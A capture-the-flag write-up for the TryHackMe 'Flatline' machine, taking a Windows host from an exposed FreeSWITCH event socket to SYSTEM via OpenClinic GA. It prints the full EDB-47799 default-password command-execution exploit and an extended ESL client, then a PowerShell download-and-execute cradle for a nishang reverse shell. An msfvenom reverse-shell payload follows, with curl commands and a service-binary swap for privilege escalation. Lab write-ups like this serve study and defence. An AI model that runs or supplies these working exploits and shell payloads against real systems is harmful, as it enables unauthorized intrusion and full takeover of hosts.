Flatline (FreeSwitch, OpenClinic)
First, we need to scan using nmap.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/flatline
╰─➤ nmap -A -Pn 10.10.21.42 | tee nmap.log
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-03 01:17 +0630
Nmap scan report for 10.10.21.42
Host is up (0.25s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: WIN-EOM4PK0578N
| NetBIOS_Domain_Name: WIN-EOM4PK0578N
| NetBIOS_Computer_Name: WIN-EOM4PK0578N
| DNS_Domain_Name: WIN-EOM4PK0578N
| DNS_Computer_Name: WIN-EOM4PK0578N
| Product_Version: 10.0.17763
|_ System_Time: 2022-04-02T18:46:39+00:00
| ssl-cert: Subject: commonName=WIN-EOM4PK0578N
| Not valid before: 2021-11-08T16:47:35
|_Not valid after: 2022-05-10T16:47:35
|_ssl-date: 2022-04-02T18:46:40+00:00; -56s from scanner time.
8021/tcp open freeswitch-event FreeSWITCH mod_event_socket
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -56s, deviation: 0s, median: -56s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.88 seconds
Port 3389 is RDP. The interesting one is 8021: FreeSWITCH's event socket (mod_event_socket), a management interface that should never be reachable from the network. Let's connect with netcat.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/flatline
╰─➤ nc 10.10.21.42 8021
Content-Type: auth/request
Content-Type: text/disconnect-notice
Content-Length: 67
Disconnected, goodbye.
See you at ClueCon! http://www.cluecon.com/
The service sends an auth/request and then drops the idle connection. Connect with telnet instead so we can answer the prompt. A quick search turns up the default password, ClueCon, which many installs never change: http://lists.freeswitch.org/pipermail/freeswitch-users/2009-January/038381.html
╭─hnl@hnl ~/Desktop/ctf/tryhackme/flatline
╰─➤ telnet 10.10.21.42 8021
Trying 10.10.21.42...
Connected to 10.10.21.42.
Escape character is '^]'.
Content-Type: auth/request
auth ClueCon
Content-Type: command/reply
Reply-Text: +OK accepted
help
Content-Type: command/reply
Reply-Text: -ERR command not found
Searching for an exploit for this service turns up EDB-47799, a Python script that authenticates with the default password and runs an operating-system command through the api system command: https://www.exploit-db.com/exploits/47799
#!/usr/bin/python3
# EDB-47799: FreeSWITCH mod_event_socket default-password command execution
from socket import *
import sys

if len(sys.argv) != 3:
    print('Missing arguments')
    print('Usage: freeswitch-exploit.py <target> <cmd>')
    sys.exit(1)

ADDRESS=sys.argv[1]
CMD=sys.argv[2]
PASSWORD='ClueCon' # default password for FreeSWITCH

s=socket(AF_INET, SOCK_STREAM)
s.connect((ADDRESS, 8021))
response = s.recv(1024)

if b'auth/request' in response:
    # ESL commands are terminated by a blank line, hence the double newline
    s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
    response = s.recv(1024)
    if b'+OK accepted' in response:
        print('Authenticated')
        # 'api system <cmd>' executes <cmd> on the FreeSWITCH host
        s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
        response = s.recv(8096).decode()
        print(response)
    else:
        print('Authentication failed')
        sys.exit(1)
else:
    print('Not prompted for authentication, likely not vulnerable')
    sys.exit(1)
Running the script against the target confirms command execution. The same thing works by hand in the telnet session: after auth ClueCon, sending api system <cmd> runs <cmd> on the host and returns its output.
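Both the exploit above and the manual telnet session read whatever a single recv(1024) happens to return, which truncates long command output. ESL actually frames every reply with headers plus a Content-Length, which is why the disconnect notice netcat received announced 67 bytes. The following Python client is an added example, not part of the original writeup or of EDB-47799: it parses that framing, logs in with the default password and runs api system, returning the complete body. FakeEslServer is a constructed stand-in for the target so the code runs offline; against a live host, pass a socket.socket connected to port 8021 in its place.

```python
"""Small FreeSWITCH Event Socket (ESL) client that reassembles replies by
Content-Length instead of trusting one recv(1024). FakeEslServer is a
constructed stand-in for the target so the example runs offline.
"""

DEFAULT_PASSWORD = "ClueCon"   # FreeSWITCH's shipped ESL password

# The disconnect notice netcat received above; the body is exactly 67 bytes.
DISCONNECT_BANNER = (b"Content-Type: text/disconnect-notice\n"
                     b"Content-Length: 67\n\n"
                     b"Disconnected, goodbye.\n"
                     b"See you at ClueCon! http://www.cluecon.com/\n")


def parse_esl_message(buf: bytes):
    """Split one ESL frame off the front of buf: 'Name: value' header lines,
    a blank line, then exactly Content-Length bytes of body (0 if absent).
    Returns (headers, body, rest), or None while the frame is incomplete."""
    sep = buf.find(b"\n\n")
    if sep == -1:
        return None
    header_block, rest = buf[:sep], buf[sep + 2:]
    headers = {}
    for line in header_block.decode("utf-8", "replace").split("\n"):
        name, _, value = line.partition(":")
        if value:
            headers[name.strip()] = value.strip()
    length = int(headers.get("Content-Length", "0"))
    if len(rest) < length:
        return None                      # body still arriving
    return headers, rest[:length], rest[length:]


class EslConnection:
    """Reads whole frames from anything exposing recv(n) and sendall(b)."""

    def __init__(self, sock):
        self.sock, self.buf = sock, b""

    def read_message(self):
        while (parsed := parse_esl_message(self.buf)) is None:
            chunk = self.sock.recv(4096)
            if not chunk:
                raise ConnectionError("ESL peer closed the connection")
            self.buf += chunk
        headers, body, self.buf = parsed
        return headers, body

    def command(self, line: str):
        self.sock.sendall(line.encode() + b"\n\n")   # blank line ends a command
        return self.read_message()


def esl_login(sock, password=DEFAULT_PASSWORD):
    """Authenticate; return an EslConnection on '+OK', None otherwise."""
    conn = EslConnection(sock)
    headers, _ = conn.read_message()
    if headers.get("Content-Type") != "auth/request":
        return None
    headers, _ = conn.command(f"auth {password}")
    return conn if headers.get("Reply-Text", "").startswith("+OK") else None


def esl_system(conn: EslConnection, cmd: str) -> str:
    """Run 'api system <cmd>' (what EDB-47799 sends) and return the whole body."""
    headers, body = conn.command(f"api system {cmd}")
    if headers.get("Content-Type") != "api/response":
        raise RuntimeError(f"unexpected reply: {headers}")
    return body.decode("utf-8", "replace")


class FakeEslServer:
    """Constructed peer mimicking mod_event_socket's auth and api replies.
    `chunk` caps what recv() returns per call; a small value forces the
    reassembly that a bare recv(1024) would get wrong."""

    def __init__(self, password=DEFAULT_PASSWORD, chunk=4096):
        self.password, self.chunk = password, chunk
        self.out = b"Content-Type: auth/request\n\n"

    def recv(self, n):
        n = min(n, self.chunk)
        data, self.out = self.out[:n], self.out[n:]
        return data

    def sendall(self, data):
        line = data.decode().strip()
        if line == f"auth {self.password}":
            self.out += b"Content-Type: command/reply\nReply-Text: +OK accepted\n\n"
        elif line.startswith("auth "):
            self.out += b"Content-Type: command/reply\nReply-Text: -ERR invalid\n\n"
        elif line.startswith("api "):
            body = f"[fake output of: {line[4:]}]\n".encode()
            self.out += b"Content-Type: api/response\nContent-Length: %d\n\n" % len(body) + body
```

Usage against the fake peer is esl_system(esl_login(FakeEslServer()), "whoami"); esl_login returning None is the signal that the password has been changed, which makes the same function a quick default-credential check for a fleet of FreeSWITCH hosts.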
Let's get a reverse shell with nishang's Invoke-PowerShellTcp.ps1. At the end of the file we append a call to Invoke-PowerShellTcp so the shell launches as soon as the script is loaded, then save the modified copy as Invoke-PowerShellTcpEx.ps1. The tail of the modified file:
    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
        Write-Error $_
    }
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.9.2.121 -Port 9001
With a web server hosting the script and a netcat listener on port 9001, run the exploit so the target downloads and executes it in memory:
╭─hnl@hnl ~/Desktop/ctf/tryhackme/flatline
╰─➤ python3 exploit.py 10.10.21.42 "powershell.exe iex (iwr http://10.9.2.121/Invoke-PowerShellTcpEx.ps1 -UseBasicParsing)"
The listener receives a reverse shell from the target. We can read the user flag from Nekrotic's desktop, but not the root flag.

In C:\ there is an unusual directory, projects:
PS C:\users\Nekrotic\Desktop> cd c:\
PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 15/09/2018 08:19 PerfLogs
d-r--- 09/11/2021 16:41 Program Files
d----- 09/11/2021 07:13 Program Files (x86)
d----- 09/11/2021 07:18 projects
d-r--- 09/11/2021 07:28 Users
d----- 09/11/2021 16:47 Windows
Inside it is an OpenClinic GA installation, bundled with its own JDK, MariaDB and Tomcat:
PS C:\projects\openclinic> dir
Directory: C:\projects\openclinic
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 09/11/2021 07:29 jdk1.8
d----- 09/11/2021 07:19 mariadb
d----- 09/11/2021 07:30 tomcat8
d----- 09/11/2021 07:29 Uninstall
-a---- 06/04/2021 23:14 250 configureCountry.bat
-a---- 01/07/2021 18:20 167 configureLanguage.bat
-a---- 09/11/2021 07:18 334840 lua5.1.dll
-a---- 07/06/2021 16:58 93696 OpenClinic GA login.exe
-a---- 08/05/2020 12:17 27136 OpenClinicStartServices.exe
-a---- 02/05/2021 00:45 316 stopOpenClinicHttp.bat
-a---- 09/11/2021 07:18 1389568 uninstall.exe
EDB-50448 (https://www.exploit-db.com/exploits/50448) covers a local privilege escalation in OpenClinic GA: the bundled MariaDB service binary mysqld.exe can be replaced by a low-privileged user and runs as SYSTEM when the service starts. First, build a malicious executable with msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=10.9.2.121 LPORT=9002 -f exe > mysqld_evil.exe
Serve it over HTTP and download it on the victim, into the MariaDB bin directory:
curl http://10.9.2.121/mysqld_evil.exe -o "C:\projects\openclinic\mariadb\bin\mysqld_evil.exe"
Swap the original service binary for ours, keeping a backup:
PS C:\projects\openclinic\mariadb\bin> mv mysqld.exe mysqld.exe.bak
PS C:\projects\openclinic\mariadb\bin> mv mysqld_evil.exe mysqld.exe
Reboot so the MariaDB service starts the replaced binary (start a listener on port 9002 first):
shutdown /r
The listener on port 9002 receives a shell running as SYSTEM, and the root flag can be read.
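Before overwriting mysqld.exe it is worth confirming the two conditions this escalation needs: that a low-privileged user can actually write the service binary, and that the service runs as SYSTEM (visible on the target with sc qc or Get-CimInstance Win32_Service; the page's SYSTEM shell confirms it after the fact). The snippet below is an added example, not part of the writeup or of EDB-50448: it parses icacls output copied from the target and flags ACEs that let everyday principals overwrite the file. The two samples are constructed for illustration, one in the weak state this attack relies on and one with Users reduced to read/execute; neither is the real ACL of the Flatline box.

```python
"""Spot file ACLs that let a low-privilege user replace a service binary.

Parses the output of `icacls <file>` (run on the target) and reports ACEs that
grant write-capable rights to everyday principals. Both samples below are
constructed for this example, not captured from the Flatline machine.
"""
import re

SAMPLE_PATH = r"C:\projects\openclinic\mariadb\bin\mysqld.exe"

# Constructed: the weak state the OpenClinic privesc relies on (Users hold Full control).
SAMPLE_WEAK = SAMPLE_PATH + r""" BUILTIN\Users:(I)(F)
                                              NT AUTHORITY\SYSTEM:(I)(F)
                                              BUILTIN\Administrators:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed: the same file after the fix (Users reduced to read and execute).
SAMPLE_HARDENED = SAMPLE_PATH + r""" BUILTIN\Users:(I)(RX)
                                              NT AUTHORITY\SYSTEM:(I)(F)
                                              BUILTIN\Administrators:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals that in practice mean "any logged-on user".
LOW_PRIV = {r"BUILTIN\Users", r"NT AUTHORITY\Authenticated Users", "Everyone",
            r"NT AUTHORITY\INTERACTIVE"}
# icacls inheritance flags, which say nothing about the rights granted.
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
# Rights that allow overwriting, deleting or replacing the file.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WEA", "WA", "DC", "WDAC", "WO"}

# One ACE per line: optional indent, principal, ':', then one or more '(...)' groups.
ACE_RE = re.compile(r"^\s*(?P<who>[^:]+?):(?P<perms>(?:\([^)]*\))+)\s*$")


def parse_icacls(output: str, path: str):
    """Yield (principal, set_of_rights) for every ACE in icacls output."""
    for line in output.splitlines():
        if line.startswith(path):          # the first ACE line carries the file name
            line = line[len(path):]
        m = ACE_RE.match(line)
        if not m:                          # blank line or the summary line
            continue
        rights = set()
        for group in re.findall(r"\(([^)]*)\)", m.group("perms")):
            if group in INHERIT_FLAGS:
                continue
            rights.update(r.strip() for r in group.split(","))   # e.g. "RX,W"
        yield m.group("who").strip(), rights


def weak_aces(output: str, path: str):
    """Return [(principal, sorted rights)] for low-priv principals that can write."""
    return [(who, sorted(rights)) for who, rights in parse_icacls(output, path)
            if who in LOW_PRIV and rights & WRITE_RIGHTS]
```

weak_aces(SAMPLE_WEAK, SAMPLE_PATH) names BUILTIN\Users with Full control, which is exactly what lets the mv in the steps above succeed; the hardened sample returns nothing, and an empty result is the cue to look for a different escalation path rather than proceed with the binary swap.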